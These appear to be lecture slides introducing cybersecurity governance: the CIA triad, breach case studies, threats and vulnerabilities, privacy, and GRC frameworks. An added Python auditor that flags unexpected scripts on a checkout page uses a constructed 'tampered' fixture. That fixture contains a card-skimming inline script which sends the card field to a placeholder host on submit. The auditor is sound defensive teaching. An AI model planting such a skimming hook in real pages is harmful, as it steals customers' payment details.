Week 2 - Intro to CSG

The document provides an introduction to cybersecurity governance, outlining key concepts such as the CIA Triad (Confidentiality, Integrity, Availability), threats and vulnerabilities, and the impact of cyber breaches on organizations. It emphasizes the importance of cybersecurity in protecting information systems and highlights the need for a structured Governance, Risk, and Compliance (GRC) framework. The course aims to equip students with the knowledge to build effective cybersecurity programs and understand risk management in relation to information technology.


Cybersecurity Governance

ITSS 4362

Week 2 – Intro to CSG


Professor Khan
Introduction to Cybersecurity

Learning Objectives
• Understand the context of Cybersecurity
• Cybersecurity defined
• Cybersecurity Focus
• Cost of Cybercrimes
• Goal of Cybersecurity
• CIA Triad (Confidentiality / Integrity / Availability)
• Threats and Vulnerabilities
• Threat Landscape
• Attack Vectors
• Organizational Safeguards
• Cybersecurity Awareness
• Cybersecurity Statistics
• Cybersecurity Governance
Cyber Breaches
What

• Online retailer of custom mugs and apparel was hacked for a four-month period in the latter half of 2018

How

• Malicious card-skimming code was placed on its payment website

Theft

• Hackers were able to steal full payment card details (number, security code, and expiration date), names, addresses, phone numbers, email addresses, and postal codes.

Impact

• The company did not say how many customers were affected; the number is reported to be in the tens of thousands, given the volume of transactions on the website during the months-long breach.
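The check a practitioner would want after a skimming incident like the one above is a script inventory of the checkout page compared against a known-good baseline: any external script URL or inline script body that was not there when the page was last reviewed is flagged. The example below is added here and is not part of the slides or of the retailer's own tooling. The two page snippets, the `/static/checkout.js` path and the `cdn.example-stats.invalid` host are all constructed for illustration.

```python
"""Flag scripts on a checkout page that are absent from a reviewed baseline.

Added example, not from the slides. All page content below is constructed;
the hostnames and paths are placeholders, not real sites.
"""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []       # values of <script src="...">
        self.inline = []         # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data; collect them.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def fingerprint_page(html):
    """Return (set of external src values, set of SHA-256 of inline bodies)."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    inline_hashes = {
        hashlib.sha256(body.strip().encode("utf-8")).hexdigest()
        for body in parser.inline
    }
    return set(parser.external), inline_hashes


def baseline_from(html):
    """Build the allowlist from a reviewed, known-good copy of the page."""
    external, inline_hashes = fingerprint_page(html)
    return sorted(external), sorted(inline_hashes)


def find_unexpected_scripts(html, baseline_external, baseline_inline_hashes):
    """Scripts on the live page that the baseline does not account for."""
    external, inline_hashes = fingerprint_page(html)
    return {
        "external": sorted(external - set(baseline_external)),
        "inline": sorted(inline_hashes - set(baseline_inline_hashes)),
    }


# Constructed known-good checkout page (placeholder path).
CLEAN_CHECKOUT = """<html><body>
<form id="payment"><input name="cc"></form>
<script src="/static/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
</body></html>"""

# Constructed tampered copy: one extra loader from a placeholder host and one
# inline hook that posts the card field off-site on submit.
TAMPERED_CHECKOUT = """<html><body>
<form id="payment"><input name="cc"></form>
<script src="/static/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
<script src="https://cdn.example-stats.invalid/analytics.js"></script>
<script>document.forms[0].addEventListener("submit", function () {
  new Image().src = "https://cdn.example-stats.invalid/c?" +
    encodeURIComponent(document.forms[0].cc.value);
});</script>
</body></html>"""


def audit_tampered():
    """Compare the tampered page against the baseline taken from the clean one."""
    base_external, base_inline = baseline_from(CLEAN_CHECKOUT)
    return find_unexpected_scripts(TAMPERED_CHECKOUT, base_external, base_inline)


if __name__ == "__main__":
    for kind, items in audit_tampered().items():
        for item in items:
            print(f"unexpected {kind} script: {item}")
```

Inline bodies are compared by hash rather than by text so the baseline file never has to carry page source, and a one-character change to a legitimate inline script shows up as a new hash, which is the behaviour you want when the question is "did anything on the payment page change since review". In practice the baseline is taken from the deployed page at review time and the audit runs on a schedule against the live URL.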
Cyber Breaches

What

• Alaska Department of Health & Social Services (DHSS)

How

• A preliminary investigation found that the virus bypassed multiple layers of security, and that the infected computer, which stored confidential documents on clients, interacted with Russia-based IP addresses.

Theft

• The attacker was able to access names, social security numbers, dates of birth, addresses, health information, benefit information and other personal information such as income.

Impact

• Exposed data on at least 100,000 people


Cyber Breaches

What

• University of Washington Medical

How

• A vulnerability on the health network's website server exposed protected health information, including names, medical record numbers, and a description of each individual's information.

Theft

• Fortunately, no medical records were exposed

Impact

• Nearly 1 million patients' data exposed


Cyber Breaches
What

• City of Tallahassee

How

• The out-of-state, third-party vendor that hosts the city's payroll services was hacked and, as a result, direct-deposit paychecks were redirected. Employees throughout the city's workforce were affected.

Theft

• City officials responsible for investigating the incident suspect the cyberattack came from a foreign nation.

Impact

• Nearly $500,000 of the City of Tallahassee employees' payroll was stolen by hackers who redirected direct deposits into an unauthorized account.
Cybersecurity Defined

• Cybersecurity's goal: Protect our information and information systems

• Cybersecurity is: "Protection of information systems against unauthorized access to or modification of information, whether in storage, processing or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats."
CIA Triad

Confidentiality: Safeguards information from being accessed by individuals without the proper clearance, access level, and need to know.

Integrity: Results from protection against unauthorized modification or destruction of information.

Availability: Making sure that your information is available when you need it (by making back-up copies and, if appropriate, storing the back-up copies off-site).
Cybersecurity Focus

• Keeping the Bad Guys out

• Protecting your Internal Network

• Recovering from an Attack

• Security is Everyone’s responsibility


Potential Impact of Cyber Attacks

Reputation
• May harm the reputation of an organization in the eyes of their customers / clients / among
competitors / partners / businesses/ government agencies

Legal
• May result in violation of laws or contract requirements
• Risk of prosecution, financial penalties, or withdrawal of existing and future funding

Economic
• May undermine the ability to capitalize on potential intellectual property or knowledge transfer

Operational
• May disrupt normal operations and result in significant remedial cost
Evolution of Technology vs Cyber Threats
Cybersecurity and Emerging Technologies

Labels recovered from the slide diagram:

• Internet of Things
• Nation State Actors
• Blockchain and Cryptocurrencies
• Cyber Espionage / Cyberwar / Cybercrime
• Machine Learning / Automation / Artificial Intelligence
• Fraud / Identity Theft / Protection
• Regulatory Evolution
• Cloud / Virtualization
Barriers in Addressing Cybersecurity Issues
Cost of Cybercrime
Threats and Vulnerabilities

• What are we protecting our and our stakeholders' information from?

– Threats: any circumstances or events that can potentially harm an information system by destroying it, disclosing the information stored on the system, adversely modifying data, or making the system unavailable

– Vulnerabilities: weaknesses in an information system or its components that could be exploited.
Threat Landscape
Sources of Threats
Organizational Safeguards
2019 Cybersecurity Talent Gap
Privacy Defined

• Information privacy, or data privacy: the relationship between collection and dissemination of data, technology, the public expectation of privacy, and the legal and political issues surrounding them.

• Information privacy is the right to control what information about a person is released.
Sensitive Data
• Information is considered sensitive if the loss of
Confidentiality, Integrity, or Availability could be
expected to have a serious, severe, or
catastrophic adverse effect on organizational
operations, organizational assets, or individuals.

• Types of sensitive information include:


– Personnel
– Financial
– Payroll
– Medical
Cybersecurity Awareness
Governance, Risk, and Compliance

Governance, Risk, and Compliance (GRC) Framework:

• A framework for the leadership, organization, and operation of the institution's IT areas to ensure that those areas support and enable the institution's strategic objectives.

GRC programs align institutional activities with larger institutional goals (i.e., governance) and allow the identification of challenges and opportunities (i.e., risk), and when internal requirements and external mandates are lined up (i.e., compliance), institutional activities have the best chance for success, especially in stormy weather or where danger lurks.
Governance Continued

Layers recovered from the slide diagram (activity: scope, owner):

• Approve: Executive Leadership (Executive Management / CIO)
• Define: Enterprise Policy and Standards (CISO)
• Interpret: Operational Governance (Line of Business, Line of Business)
• Implement: Operations (Human Resources, Datacenter)
Holistic Cybersecurity Governance Program

Components surrounding the Governance Program in the slide diagram:

• Quality Assurance / Quality Control
• Risk Management
• Adherence to LRRs
• Process Adherence
• Audits and Oversight
• Education and Socialization
Goal of this course
- Understanding of the importance of Cybersecurity and Governance programs in relation to organizational goals.

- The ability to build a Cybersecurity Program.

- Explain and understand Risk Management in relation to Information Technology.

- Explain and understand Technology Audits, InfoSec Policy, Standards, and LRRs.
